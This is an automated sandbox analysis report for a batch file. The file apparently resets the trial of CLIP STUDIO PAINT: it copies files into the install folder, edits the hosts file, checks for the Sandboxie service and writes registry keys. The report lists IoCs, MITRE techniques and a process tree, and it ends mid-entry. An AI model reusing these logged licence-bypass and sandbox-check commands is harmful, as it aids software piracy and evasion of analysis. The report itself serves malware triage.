5661c9345c5a0d8e76c7b76158006554a9721526a6ea0e8adfdd34bf47bf08db

Resubmissions

27/04/2024, 10:20

240427-mc49nahb6s 8

27/04/2024, 10:17

240427-mbg3qshb2z 8

27/04/2024, 10:12

240427-l81exagc99 8

Analysis

max time kernel
997s
max time network
940s
platform
windows11-21h2_x64
resource
win11-20240419-en
resource tags

arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
submitted
27/04/2024, 10:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0EXNM3VL.bat
Size

23KB
MD5

f94ee210eb268d477b98419357872564
SHA1

85032ece2031a10f2839d10ffd13ca3a05d76a4d
SHA256

5661c9345c5a0d8e76c7b76158006554a9721526a6ea0e8adfdd34bf47bf08db
SHA512

a1ccb8f70558290d59e0488b9e86e5b74e86e5ec17b88022c977e7e4d648b49ec0df6923f0c22495cf30cc1ec154995f9a7f655296322a77d31d1f3fe3f1240f
SSDEEP

384:fSpSw/3x030ySTMmmXfUHb+h8ilPdaN5RdHkZ2fvqS2p0glkZXiJZGOrIOCq+iCI:fSpSw/3x030ySFmXfUHb+h8ilPdaN5RO

Score

8^/10

Malware Config

Signatures

Drops file in Drivers directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
48	ipinfo.io
54	ipinfo.io
62	ipinfo.io
66	ipinfo.io

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
920	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133586869140207172"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000_Classes\Local Settings	firefox.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
4948	NOTEPAD.EXE
2068	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2028	chrome.exe
2028	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	920	tasklist.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe
Token: SeCreatePagefilePrivilege	2028	chrome.exe
Token: SeShutdownPrivilege	2028	chrome.exe

Suspicious use of FindShellTrayWindow 48 IoCs

pid	Process
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
4592	firefox.exe
2028	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe
2028	chrome.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2436	MiniSearchHost.exe
4592	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 840 wrote to memory of 688	840	cmd.exe	82
PID 840 wrote to memory of 688	840	cmd.exe	82
PID 840 wrote to memory of 3104	840	cmd.exe	83
PID 840 wrote to memory of 3104	840	cmd.exe	83
PID 840 wrote to memory of 1972	840	cmd.exe	84
PID 840 wrote to memory of 1972	840	cmd.exe	84
PID 840 wrote to memory of 3380	840	cmd.exe	85
PID 840 wrote to memory of 3380	840	cmd.exe	85
PID 3380 wrote to memory of 920	3380	cmd.exe	86
PID 3380 wrote to memory of 920	3380	cmd.exe	86
PID 840 wrote to memory of 4784	840	cmd.exe	88
PID 840 wrote to memory of 4784	840	cmd.exe	88
PID 840 wrote to memory of 1240	840	cmd.exe	89
PID 840 wrote to memory of 1240	840	cmd.exe	89
PID 840 wrote to memory of 5024	840	cmd.exe	90
PID 840 wrote to memory of 5024	840	cmd.exe	90
PID 5024 wrote to memory of 3140	5024	cmd.exe	91
PID 5024 wrote to memory of 3140	5024	cmd.exe	91
PID 840 wrote to memory of 2852	840	cmd.exe	92
PID 840 wrote to memory of 2852	840	cmd.exe	92
PID 2852 wrote to memory of 4464	2852	cmd.exe	93
PID 2852 wrote to memory of 4464	2852	cmd.exe	93
PID 2028 wrote to memory of 2724	2028	chrome.exe	103
PID 2028 wrote to memory of 2724	2028	chrome.exe	103
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4656	2028	chrome.exe	104
PID 2028 wrote to memory of 4008	2028	chrome.exe	105
PID 2028 wrote to memory of 4008	2028	chrome.exe	105
PID 2028 wrote to memory of 3448	2028	chrome.exe	106
PID 2028 wrote to memory of 3448	2028	chrome.exe	106
PID 2028 wrote to memory of 3448	2028	chrome.exe	106
PID 2028 wrote to memory of 3448	2028	chrome.exe	106
PID 2028 wrote to memory of 3448	2028	chrome.exe	106
PID 2028 wrote to memory of 3448	2028	chrome.exe	106
PID 2028 wrote to memory of 3448	2028	chrome.exe	106
PID 2028 wrote to memory of 3448	2028	chrome.exe	106

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0EXNM3VL.bat"
1⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID:840
- C:\Windows\system32\xcopy.exe
  xcopy "\Pro" "C:\Program Files\CELSYS\CLIP STUDIO 1.5\CLIP STUDIO PAINT" /S /E /Y /R
  2⤵
  PID:688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo ------ Trial is successfully removed! ------ "
  2⤵
  PID:3104
- C:\Windows\system32\msg.exe
  msg *
  2⤵
  PID:1972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c tasklist /fi "imagename eq SbieSvc.exe" /fo csv /nh
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3380
- - C:\Windows\system32\tasklist.exe
    tasklist /fi "imagename eq SbieSvc.exe" /fo csv /nh
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:920
- C:\Windows\system32\reg.exe
  Reg query "HKLM\SOFTWARE\Microsoft\Alu" /s /reg:32
  2⤵
  PID:4784
- C:\Windows\system32\reg.exe
  Reg Add "HKLM\SOFTWARE\Microsoft\Alu" /f /reg:32
  2⤵
  PID:1240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v "SystemProductName"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v "SystemProductName"
    3⤵
    PID:3140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current" /v "SystemProductName"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current" /v "SystemProductName"
    3⤵
    PID:4464

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2436

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4068

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\0EXNM3VL.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:4948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7fff9143cc40,0x7fff9143cc4c,0x7fff9143cc58
  2⤵
  PID:2724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1900,i,2863080822224954674,15532763702110798725,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=1880 /prefetch:2
  2⤵
  PID:4656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2112,i,2863080822224954674,15532763702110798725,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2104 /prefetch:3
  2⤵
  PID:4008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2176,i,2863080822224954674,15532763702110798725,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=2212 /prefetch:8
  2⤵
  PID:3448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,2863080822224954674,15532763702110798725,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3132 /prefetch:1
  2⤵
  PID:920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,2863080822224954674,15532763702110798725,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:1988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3572,i,2863080822224954674,15532763702110798725,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4456 /prefetch:1
  2⤵
  PID:3316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4724,i,2863080822224954674,15532763702110798725,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4736 /prefetch:8
  2⤵
  PID:3704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4816,i,2863080822224954674,15532763702110798725,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4772 /prefetch:1
  2⤵
  PID:3040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4600,i,2863080822224954674,15532763702110798725,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5112 /prefetch:1
  2⤵
  PID:4376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3408,i,2863080822224954674,15532763702110798725,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4336 /prefetch:1
  2⤵
  PID:2760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3160,i,2863080822224954674,15532763702110798725,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4152 /prefetch:1
  2⤵
  PID:3048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3432,i,2863080822224954674,15532763702110798725,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4392 /prefetch:1
  2⤵
  PID:4736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=3412,i,2863080822224954674,15532763702110798725,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4480 /prefetch:1
  2⤵
  PID:1608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=3508,i,2863080822224954674,15532763702110798725,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3444 /prefetch:1
  2⤵
  PID:2440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3464,i,2863080822224954674,15532763702110798725,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3308 /prefetch:1
  2⤵
  PID:6108

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:2852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2832

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:1104
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:4592
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1940 -parentBuildID 20240401114208 -prefsHandle 1864 -prefMapHandle 1432 -prefsLen 25459 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {905dcd25-b842-4eec-a144-92a52089da70} 4592 "\\.\pipe\gecko-crash-server-pipe.4592" gpu
    3⤵
    PID:464
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2348 -parentBuildID 20240401114208 -prefsHandle 2340 -prefMapHandle 2336 -prefsLen 25495 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ee75392-d00d-4a73-8486-5b19b33017bd} 4592 "\\.\pipe\gecko-crash-server-pipe.4592" socket
    3⤵
    - Checks processor information in registry
    PID:4780
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3012 -childID 1 -isForBrowser -prefsHandle 2992 -prefMapHandle 3016 -prefsLen 25636 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d5354da-cb9a-4890-9afa-e95d2366db49} 4592 "\\.\pipe\gecko-crash-server-pipe.4592" tab
    3⤵
    PID:3228
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3680 -childID 2 -isForBrowser -prefsHandle 3668 -prefMapHandle 3660 -prefsLen 30869 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a12f6fea-c8da-45ff-9b76-13a8d483c299} 4592 "\\.\pipe\gecko-crash-server-pipe.4592" tab
    3⤵
    PID:236
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4728 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4724 -prefMapHandle 4720 -prefsLen 30869 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29ca8947-378d-4109-8ac9-15bc4e801b7d} 4592 "\\.\pipe\gecko-crash-server-pipe.4592" utility
    3⤵
    - Checks processor information in registry
    PID:5528
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5104 -childID 3 -isForBrowser -prefsHandle 5168 -prefMapHandle 5164 -prefsLen 26990 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9b119e16-74c7-4e63-9b01-6bf36d79d631} 4592 "\\.\pipe\gecko-crash-server-pipe.4592" tab
    3⤵
    PID:5800
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5396 -childID 4 -isForBrowser -prefsHandle 5312 -prefMapHandle 5284 -prefsLen 26990 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d68ec69-d16f-48a6-afc1-7c2ff07dfd40} 4592 "\\.\pipe\gecko-crash-server-pipe.4592" tab
    3⤵
    PID:5812
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5296 -childID 5 -isForBrowser -prefsHandle 5544 -prefMapHandle 5552 -prefsLen 26990 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fedf2724-3b20-4aab-abb4-f6dedae69831} 4592 "\\.\pipe\gecko-crash-server-pipe.4592" tab
    3⤵
    PID:5824
- - C:\Program Files\Mozilla Firefox\firefox.exe
